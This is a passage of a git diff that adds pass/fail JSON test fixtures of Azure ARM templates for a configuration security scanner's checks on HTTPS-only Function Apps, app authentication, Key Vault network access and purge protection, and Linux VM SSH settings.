+        "[resourceId('Microsoft.Web/sites', parameters('webSiteName'))]"
+      ]
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_FunctionAppsAccessibleOverHttps/sites_config_pass1.json b/tests/arm/checks/resource/example_FunctionAppsAccessibleOverHttps/sites_config_pass1.json
new file mode 100644
index 00000000000..29b95b85347
--- /dev/null
+++ b/tests/arm/checks/resource/example_FunctionAppsAccessibleOverHttps/sites_config_pass1.json
@@ -0,0 +1,56 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.15.31.15270",
+      "templateHash": "11556880252039009077"
+    }
+  },
+  "parameters": {
+    "hostingPlanName": {
+      "type": "string",
+      "minLength": 1,
+      "metadata": {
+        "description": "Name of the hosting plan to use in Azure."
+      }
+    },
+    "webSiteName": {
+      "type": "string",
+      "minLength": 1,
+      "metadata": {
+        "description": "Name of the Azure Web app to create."
+      }
+    }
+  },
+  "resources": [
+
+
+    {
+      "type": "Microsoft.Web/sites/config",
+      "apiVersion": "2022-03-01",
+      "name": "sites_config_pass1",
+      "properties": {
+        "globalValidation": {
+      "requireAuthentication": true,
+      "unauthenticatedClientAction": "Return401"
+    },
+    "httpSettings": {
+      "forwardProxy": {
+        "convention": "NoProxy"
+      },
+      "routes": {
+        "apiPrefix": "/.auth"
+      }
+    },
+        "javaVersion": "1.8",
+        "javaContainer": "TOMCAT",
+        "javaContainerVersion": "9.0"
+      },
+      "dependsOn": [
+        "[resourceId('Microsoft.Web/sites', parameters('webSiteName'))]"
+      ]
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_FunctionAppsAccessibleOverHttps/sites_fail.json b/tests/arm/checks/resource/example_FunctionAppsAccessibleOverHttps/sites_fail.json
new file mode 100644
index 00000000000..1be97affa6b
--- /dev/null
+++ b/tests/arm/checks/resource/example_FunctionAppsAccessibleOverHttps/sites_fail.json
@@ -0,0 +1,76 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.5.6.12127",
+      "templateHash": "10602523904429381366"
+    }
+  },
+  "parameters": {
+
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    },
+    "linuxFxVersion": {
+      "type": "string",
+      "defaultValue": "DOTNETCORE|3.0",
+      "metadata": {
+        "description": "The Runtime stack of current web app"
+      }
+    }
+  },
+  "variables": {
+    "appServicePlanPortalName": "[format('AppServicePlan-{0}', parameters('webAppName'))]"
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites/slots",
+      "apiVersion": "2022-03-01",
+      "name": "sites_fail",
+      "location": "[parameters('location')]",
+      "kind": "app",
+      "properties": {
+        "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', parameters('serverFarmName'))]",
+        "httpsOnly": false,
+        "siteConfig": {
+          "detailedErrorLoggingEnabled": true,
+          "httpLoggingEnabled": true,
+          "requestTracingEnabled": true,
+          "ftpsState": "Disabled",
+          "minTlsVersion": "1.2"
+        }
+      },
+      "dependsOn": [
+        "[resourceId('Microsoft.Web/serverfarms', parameters('serverFarmName'))]",
+        "[resourceId('Microsoft.Web/sites', parameters('webAppNameBackend'))]"
+      ]
+    },
+    {
+      "type": "Microsoft.Web/sites",
+      "apiVersion": "2021-02-01",
+      "name": "sites_fail",
+      "location": "[parameters('location')]",
+      "properties": {
+        "httpsOnly": false,
+        "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanPortalName'))]",
+        "siteConfig": {
+          "linuxFxVersion": "[parameters('linuxFxVersion')]",
+          "minTlsVersion": "1.2",
+          "ftpsState": "FtpsOnly"
+        }
+      },
+      "identity": {
+        "type": "SystemAssigned"
+      },
+      "dependsOn": [
+        "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanPortalName'))]"
+      ]
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_FunctionAppsAccessibleOverHttps/sites_fail1.json b/tests/arm/checks/resource/example_FunctionAppsAccessibleOverHttps/sites_fail1.json
new file mode 100644
index 00000000000..b34b48eaa00
--- /dev/null
+++ b/tests/arm/checks/resource/example_FunctionAppsAccessibleOverHttps/sites_fail1.json
@@ -0,0 +1,74 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.5.6.12127",
+      "templateHash": "10602523904429381366"
+    }
+  },
+  "parameters": {
+
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    },
+    "linuxFxVersion": {
+      "type": "string",
+      "defaultValue": "DOTNETCORE|3.0",
+      "metadata": {
+        "description": "The Runtime stack of current web app"
+      }
+    }
+  },
+  "variables": {
+    "appServicePlanPortalName": "[format('AppServicePlan-{0}', parameters('webAppName'))]"
+  },
+  "resources": [
+      {
+      "type": "Microsoft.Web/sites/slots",
+      "apiVersion": "2022-03-01",
+      "name": "sites_fail1",
+      "location": "[parameters('location')]",
+      "kind": "app",
+      "properties": {
+        "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', parameters('serverFarmName'))]",
+        "siteConfig": {
+          "detailedErrorLoggingEnabled": true,
+          "httpLoggingEnabled": true,
+          "requestTracingEnabled": true,
+          "ftpsState": "Disabled",
+          "minTlsVersion": "1.2"
+        }
+      },
+      "dependsOn": [
+        "[resourceId('Microsoft.Web/serverfarms', parameters('serverFarmName'))]",
+        "[resourceId('Microsoft.Web/sites', parameters('webAppNameBackend'))]"
+      ]
+    },
+    {
+      "type": "Microsoft.Web/sites",
+      "apiVersion": "2021-02-01",
+      "name": "sites_fail1",
+      "location": "[parameters('location')]",
+      "properties": {
+        "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanPortalName'))]",
+        "siteConfig": {
+          "linuxFxVersion": "[parameters('linuxFxVersion')]",
+          "minTlsVersion": "1.2",
+          "ftpsState": "FtpsOnly"
+        }
+      },
+      "identity": {
+        "type": "SystemAssigned"
+      },
+      "dependsOn": [
+        "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanPortalName'))]"
+      ]
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_FunctionAppsAccessibleOverHttps/sites_pass.json b/tests/arm/checks/resource/example_FunctionAppsAccessibleOverHttps/sites_pass.json
new file mode 100644
index 00000000000..061d1462fef
--- /dev/null
+++ b/tests/arm/checks/resource/example_FunctionAppsAccessibleOverHttps/sites_pass.json
@@ -0,0 +1,90 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.5.6.12127",
+      "templateHash": "10602523904429381366"
+    }
+  },
+  "parameters": {
+
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    },
+    "sku": {
+      "type": "string",
+      "defaultValue": "F1",
+      "metadata": {
+        "description": "The SKU of App Service Plan."
+      }
+    },
+    "linuxFxVersion": {
+      "type": "string",
+      "defaultValue": "DOTNETCORE|3.0",
+      "metadata": {
+        "description": "The Runtime stack of current web app"
+      }
+    },
+    "repoUrl": {
+      "type": "string",
+      "defaultValue": " ",
+      "metadata": {
+        "description": "Optional Git Repo URL"
+      }
+    }
+  },
+  "variables": {
+    "appServicePlanPortalName": "[format('AppServicePlan-{0}', parameters('webAppName'))]"
+  },
+  "resources": [
+      {
+      "type": "Microsoft.Web/sites/slots",
+      "apiVersion": "2022-03-01",
+      "name": "sites_pass",
+      "location": "[parameters('location')]",
+      "kind": "app",
+      "properties": {
+        "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', parameters('serverFarmName'))]",
+        "httpsOnly": true,
+        "siteConfig": {
+          "detailedErrorLoggingEnabled": true,
+          "httpLoggingEnabled": true,
+          "requestTracingEnabled": true,
+          "ftpsState": "Disabled",
+          "minTlsVersion": "1.2"
+        }
+      },
+      "dependsOn": [
+        "[resourceId('Microsoft.Web/serverfarms', parameters('serverFarmName'))]",
+        "[resourceId('Microsoft.Web/sites', parameters('webAppNameBackend'))]"
+      ]
+    },
+    {
+      "type": "Microsoft.Web/sites",
+      "apiVersion": "2021-02-01",
+      "name": "sites_pass",
+      "location": "[parameters('location')]",
+      "properties": {
+        "httpsOnly": true,
+        "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanPortalName'))]",
+        "siteConfig": {
+          "linuxFxVersion": "[parameters('linuxFxVersion')]",
+          "minTlsVersion": "1.2",
+          "ftpsState": "FtpsOnly"
+        }
+      },
+      "identity": {
+        "type": "SystemAssigned"
+      },
+      "dependsOn": [
+        "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanPortalName'))]"
+      ]
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_FunctionAppsEnableAuthentication/fail.json b/tests/arm/checks/resource/example_FunctionAppsEnableAuthentication/fail.json
new file mode 100644
index 00000000000..b8950b3a4be
--- /dev/null
+++ b/tests/arm/checks/resource/example_FunctionAppsEnableAuthentication/fail.json
@@ -0,0 +1,18 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites/config",
+      "apiVersion": "2021-02-01",
+      "name": "authsettingsV2",
+      "properties": {
+        "httpSettings": {
+          "forwardProxy": {
+            "convention": "Custom"
+          }
+        }
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_FunctionAppsEnableAuthentication/fail2.json b/tests/arm/checks/resource/example_FunctionAppsEnableAuthentication/fail2.json
new file mode 100644
index 00000000000..ef6c7f7116d
--- /dev/null
+++ b/tests/arm/checks/resource/example_FunctionAppsEnableAuthentication/fail2.json
@@ -0,0 +1,21 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites/config",
+      "apiVersion": "2021-02-01",
+      "name": "authsettingsV2",
+      "properties": {
+        "httpSettings": {
+          "forwardProxy": {
+            "convention": "Custom"
+          }
+        },
+        "platform": {
+          "enabled": false
+        }
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_FunctionAppsEnableAuthentication/pass.json b/tests/arm/checks/resource/example_FunctionAppsEnableAuthentication/pass.json
new file mode 100644
index 00000000000..3e721e2de93
--- /dev/null
+++ b/tests/arm/checks/resource/example_FunctionAppsEnableAuthentication/pass.json
@@ -0,0 +1,21 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites/config",
+      "apiVersion": "2021-02-01",
+      "name": "authsettingsV2",
+      "properties": {
+        "httpSettings": {
+          "forwardProxy": {
+            "convention": "Custom"
+          }
+        },
+        "platform": {
+          "enabled": true
+        }
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_FunctionAppsEnableAuthentication/pass2.json b/tests/arm/checks/resource/example_FunctionAppsEnableAuthentication/pass2.json
new file mode 100644
index 00000000000..9f64e9cf531
--- /dev/null
+++ b/tests/arm/checks/resource/example_FunctionAppsEnableAuthentication/pass2.json
@@ -0,0 +1,18 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites/config",
+      "apiVersion": "2021-02-01",
+      "name": "pass",
+      "properties": {
+        "httpSettings": {
+          "forwardProxy": {
+            "convention": "Custom"
+          }
+        }
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/fail1.json b/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/fail1.json
new file mode 100644
index 00000000000..43a3151522e
--- /dev/null
+++ b/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/fail1.json
@@ -0,0 +1,34 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.KeyVault/vaults",
+      "apiVersion": "2019-09-01",
+      "name": "fail1",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "enabledForDiskEncryption": true,
+        "tenantId": "[subscription().tenantId]",
+        "softDeleteRetentionInDays": 90,
+        "purgeProtectionEnabled": true,
+        "sku": {
+          "family": "A",
+          "name": "standard"
+        },
+        "publicNetworkAccess": "Enabled",
+        "accessPolicies": [
+          {
+            "tenantId": "[subscription().tenantId]",
+            "objectId": "[parameters('objectId')]",
+            "permissions": {
+              "keys": ["get"],
+              "secrets": ["get"],
+              "storage": ["get"]
+            }
+          }
+        ]
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/fail2.json b/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/fail2.json
new file mode 100644
index 00000000000..786513bac3f
--- /dev/null
+++ b/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/fail2.json
@@ -0,0 +1,33 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.KeyVault/vaults",
+      "apiVersion": "2019-09-01",
+      "name": "fail2",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "enabledForDiskEncryption": true,
+        "tenantId": "[subscription().tenantId]",
+        "softDeleteRetentionInDays": 90,
+        "purgeProtectionEnabled": true,
+        "sku": {
+          "family": "A",
+          "name": "standard"
+        },
+        "accessPolicies": [
+          {
+            "tenantId": "[subscription().tenantId]",
+            "objectId": "[parameters('objectId')]",
+            "permissions": {
+              "keys": ["get"],
+              "secrets": ["get"],
+              "storage": ["get"]
+            }
+          }
+        ]
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/fail3.json b/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/fail3.json
new file mode 100644
index 00000000000..45bc2343b77
--- /dev/null
+++ b/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/fail3.json
@@ -0,0 +1,38 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.KeyVault/vaults",
+      "apiVersion": "2019-09-01",
+      "name": "fail3",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "enabledForDiskEncryption": true,
+        "tenantId": "[subscription().tenantId]",
+        "softDeleteRetentionInDays": 90,
+        "purgeProtectionEnabled": true,
+        "sku": {
+          "family": "A",
+          "name": "standard"
+        },
+        "networkAcls": {
+          "defaultAction" : "Allow",
+          "bypass" : "AzureServices",
+          "ipRules" : []
+        },
+        "accessPolicies": [
+          {
+            "tenantId": "[subscription().tenantId]",
+            "objectId": "[parameters('objectId')]",
+            "permissions": {
+              "keys": ["get"],
+              "secrets": ["get"],
+              "storage": ["get"]
+            }
+          }
+        ]
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/fail4.json b/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/fail4.json
new file mode 100644
index 00000000000..445851bb760
--- /dev/null
+++ b/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/fail4.json
@@ -0,0 +1,37 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.KeyVault/vaults",
+      "apiVersion": "2019-09-01",
+      "name": "fail4",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "enabledForDiskEncryption": true,
+        "tenantId": "[subscription().tenantId]",
+        "softDeleteRetentionInDays": 90,
+        "purgeProtectionEnabled": true,
+        "sku": {
+          "family": "A",
+          "name": "standard"
+        },
+        "networkAcls": {
+          "defaultAction" : "Allow",
+          "bypass" : "AzureServices"
+        },
+        "accessPolicies": [
+          {
+            "tenantId": "[subscription().tenantId]",
+            "objectId": "[parameters('objectId')]",
+            "permissions": {
+              "keys": ["get"],
+              "secrets": ["get"],
+              "storage": ["get"]
+            }
+          }
+        ]
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/fail5.json b/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/fail5.json
new file mode 100644
index 00000000000..a6574b63122
--- /dev/null
+++ b/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/fail5.json
@@ -0,0 +1,32 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.KeyVault/vaults",
+      "apiVersion": "2019-09-01",
+      "name": "fail5",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "enabledForDiskEncryption": true,
+        "tenantId": "[subscription().tenantId]",
+        "softDeleteRetentionInDays": 90,
+        "purgeProtectionEnabled": true,
+        "sku": {
+          "family": "A",
+          "name": "standard"
+        },
+        "networkAcls": {
+          "defaultAction": "Allow",
+          "bypass": "AzureServices",
+          "ipRules": [],
+          "virtualNetworkRules": [
+            {
+              "id": "[if(parameters('naclsEnabled'),concat(subscription().id, '/resourceGroups/', parameters('resourceGroupName'), '/providers/Microsoft.Network/virtualNetworks/<yourVirtualNetworkName>/subnets/<yourSubnetName>'),json('null'))]"
+            }
+          ]
+        }
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/pass1.json b/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/pass1.json
new file mode 100644
index 00000000000..42ad47e7128
--- /dev/null
+++ b/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/pass1.json
@@ -0,0 +1,34 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.KeyVault/vaults",
+      "apiVersion": "2019-09-01",
+      "name": "pass1",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "enabledForDiskEncryption": true,
+        "tenantId": "[subscription().tenantId]",
+        "softDeleteRetentionInDays": 90,
+        "purgeProtectionEnabled": true,
+        "sku": {
+          "family": "A",
+          "name": "standard"
+        },
+        "publicNetworkAccess": "Disabled",
+        "accessPolicies": [
+          {
+            "tenantId": "[subscription().tenantId]",
+            "objectId": "[parameters('objectId')]",
+            "permissions": {
+              "keys": ["get"],
+              "secrets": ["get"],
+              "storage": ["get"]
+            }
+          }
+        ]
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/pass2.json b/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/pass2.json
new file mode 100644
index 00000000000..39be5b74dd5
--- /dev/null
+++ b/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/pass2.json
@@ -0,0 +1,38 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.KeyVault/vaults",
+      "apiVersion": "2019-09-01",
+      "name": "pass2",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "enabledForDiskEncryption": true,
+        "tenantId": "[subscription().tenantId]",
+        "softDeleteRetentionInDays": 90,
+        "purgeProtectionEnabled": true,
+        "sku": {
+          "family": "A",
+          "name": "standard"
+        },
+        "networkAcls" : {
+          "defaultAction" : "Allow",
+          "bypass" : "AzureServices"
+        },
+        "publicNetworkAccess": "disabled",
+        "accessPolicies": [
+          {
+            "tenantId": "[subscription().tenantId]",
+            "objectId": "[parameters('objectId')]",
+            "permissions": {
+              "keys": ["get"],
+              "secrets": ["get"],
+              "storage": ["get"]
+            }
+          }
+        ]
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/pass3.json b/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/pass3.json
new file mode 100644
index 00000000000..948b0381998
--- /dev/null
+++ b/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/pass3.json
@@ -0,0 +1,39 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.KeyVault/vaults",
+      "apiVersion": "2019-09-01",
+      "name": "pass3",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "enabledForDiskEncryption": true,
+        "tenantId": "[subscription().tenantId]",
+        "softDeleteRetentionInDays": 90,
+        "purgeProtectionEnabled": true,
+        "sku": {
+          "family": "A",
+          "name": "standard"
+        },
+        "networkAcls": {
+          "defaultAction": "Allow",
+          "bypass": "AzureServices",
+          "ipRules": ["127.0.0.1"]
+        },
+        "publicNetworkAccess": "Enabled",
+        "accessPolicies": [
+          {
+            "tenantId": "[subscription().tenantId]",
+            "objectId": "[parameters('objectId')]",
+            "permissions": {
+              "keys": ["get"],
+              "secrets": ["get"],
+              "storage": ["get"]
+            }
+          }
+        ]
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/pass4.json b/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/pass4.json
new file mode 100644
index 00000000000..670a4888b40
--- /dev/null
+++ b/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/pass4.json
@@ -0,0 +1,38 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.KeyVault/vaults",
+      "apiVersion": "2019-09-01",
+      "name": "pass4",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "enabledForDiskEncryption": true,
+        "tenantId": "[subscription().tenantId]",
+        "softDeleteRetentionInDays": 90,
+        "purgeProtectionEnabled": true,
+        "sku": {
+          "family": "A",
+          "name": "standard"
+        },
+        "networkAcls": {
+          "defaultAction": "Allow",
+          "bypass": "AzureServices",
+          "ipRules": ["127.0.0.1"]
+        },
+        "accessPolicies": [
+          {
+            "tenantId": "[subscription().tenantId]",
+            "objectId": "[parameters('objectId')]",
+            "permissions": {
+              "keys": ["get"],
+              "secrets": ["get"],
+              "storage": ["get"]
+            }
+          }
+        ]
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_KeyVaultEnablesPurgeProtection/fail1.json b/tests/arm/checks/resource/example_KeyVaultEnablesPurgeProtection/fail1.json
new file mode 100644
index 00000000000..8219caa6546
--- /dev/null
+++ b/tests/arm/checks/resource/example_KeyVaultEnablesPurgeProtection/fail1.json
@@ -0,0 +1,38 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.KeyVault/vaults",
+      "apiVersion": "2019-09-01",
+      "name": "fail1",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "enabledForDiskEncryption": false,
+        "tenantId": "[data.azure_client_config.current.tenantId]",
+        "softDeleteRetentionDays": 7,
+        "enablePurgeProtection": false,
+        "sku": {
+          "family": "A",
+          "name": "standard"
+        },
+        "accessPolicies": [
+          {
+            "tenantId": "[data.azure_client_config.current.tenantId]",
+            "objectId": "[data.azure_client_config.current.objectId]",
+            "permissions": {
+              "keys": [
+                "get"
+              ],
+              "secrets": [
+                "get"
+              ],
+              "certificates": [],
+              "storage": []
+            }
+          }
+        ]
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_KeyVaultEnablesPurgeProtection/fail2.json b/tests/arm/checks/resource/example_KeyVaultEnablesPurgeProtection/fail2.json
new file mode 100644
index 00000000000..fbf1be57cb6
--- /dev/null
+++ b/tests/arm/checks/resource/example_KeyVaultEnablesPurgeProtection/fail2.json
@@ -0,0 +1,38 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.KeyVault/vaults",
+      "apiVersion": "2019-09-01",
+      "name": "fail2",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "enabledForDiskEncryption": true,
+        "tenantId": "[data.azure_client_config.current.tenantId]",
+        "softDeleteRetentionDays": 7,
+        "enablePurgeProtection": false,
+        "sku": {
+          "family": "A",
+          "name": "standard"
+        },
+        "accessPolicies": [
+          {
+            "tenantId": "[data.azure_client_config.current.tenantId]",
+            "objectId": "[data.azure_client_config.current.objectId]",
+            "permissions": {
+              "keys": [
+                "get"
+              ],
+              "secrets": [
+                "get"
+              ],
+              "certificates": [],
+              "storage": []
+            }
+          }
+        ]
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_KeyVaultEnablesPurgeProtection/pass.json b/tests/arm/checks/resource/example_KeyVaultEnablesPurgeProtection/pass.json
new file mode 100644
index 00000000000..ec90b5e09e5
--- /dev/null
+++ b/tests/arm/checks/resource/example_KeyVaultEnablesPurgeProtection/pass.json
@@ -0,0 +1,34 @@
+{
+            "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+            "contentVersion": "1.0.0.0",
+            "resources": [
+                {
+                    "type": "Microsoft.KeyVault/vaults",
+                    "apiVersion": "2019-09-01",
+                    "name": "pass",
+                    "location": "[resourceGroup().location]",
+                    "properties": {
+                        "enabledForDiskEncryption": false,
+                        "tenantId": "[data.azure_client_config.current.tenantId]",
+                        "softDeleteRetentionDays": 7,
+                        "enablePurgeProtection": true,
+                        "sku": {
+                            "family": "A",
+                            "name": "standard"
+                        },
+                        "accessPolicies": [
+                            {
+                                "tenantId": "[data.azure_client_config.current.tenantId]",
+                                "objectId": "[data.azure_client_config.current.objectId]",
+                                "permissions": {
+                                    "keys": ["get"],
+                                    "secrets": ["get"],
+                                    "certificates": [],
+                                    "storage": []
+                                }
+                            }
+                        ]
+                    }
+                }
+            ]
+        }
diff --git a/tests/arm/checks/resource/example_LinuxVMUsesSSH/fail.json b/tests/arm/checks/resource/example_LinuxVMUsesSSH/fail.json
new file mode 100644
index 00000000000..a1bf8d9c153
--- /dev/null
+++ b/tests/arm/checks/resource/example_LinuxVMUsesSSH/fail.json
@@ -0,0 +1,227 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "adminUsername": {
+      "type": "string",
+      "defaultValue": "azureuser",
+      "metadata": {
+        "description": "User name for the Virtual Machine."
+      }
+    },
+    "sshKeyData": {
+      "type": "string",
+      "metadata": {
+        "description": "SSH rsa public key file as a string."
+      }
+    },
+    "vmName": {
+      "type": "string",
+      "defaultValue": "multinicvm",
+      "metadata": {
+        "description": "Name of the VM"
+      }
+    },
+    "vmSize": {
+      "defaultValue": "Standard_D2_v3",
+      "metadata": {
+        "description": "Size of the VM"
+      },
+      "type": "string"
+    },
+    "ubuntuOSVersion": {
+      "type": "string",
+      "defaultValue": "18.04-LTS",
+      "allowedValues": [
+        "12.04.5-LTS",
+        "14.04.4-LTS",
+        "15.10",
+        "18.04-LTS"
+      ],
+      "metadata": {
+        "description": "The Ubuntu version for the VM. This will pick a fully patched image of this given Ubuntu version. Allowed values: 12.04.5-LTS, 14.04.4-LTS, 15.10, 18.04-LTS."
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "description"
+      }
+    }
+  },
+  "variables": {
+    "storageAccountName": "[concat(uniquestring(resourceGroup().id), 'samultinic')]",
+    "storageAccountType": "Standard_LRS",
+    "imagePublisher": "Canonical",
+    "imageOffer": "UbuntuServer",
+    "sshKeyPath": "[concat('/home/',parameters('adminUsername'),'/.ssh/authorized_keys')]",
+    "nic1Name": "nic1",
+    "nic2Name": "nic2",
+    "vnetName": "vnet",
+    "vnetId": "[resourceId('Microsoft.Network/virtualNetworks', variables('vnetName'))]",
+    "addressPrefix": "10.0.0.0/16",
+    "subnet1Name": "Frontend",
+    "subnet1Id": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('vnetName'), variables('subnet1Name'))]",
+    "subnet1Prefix": "10.0.1.0/24",
+    "subnet1PrivateAddress": "10.0.1.5",
+    "subnet2Name": "Web",
+    "subnet2Id": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('vnetName'), variables('subnet2Name'))]",
+    "subnet2Prefix": "10.0.2.0/24",
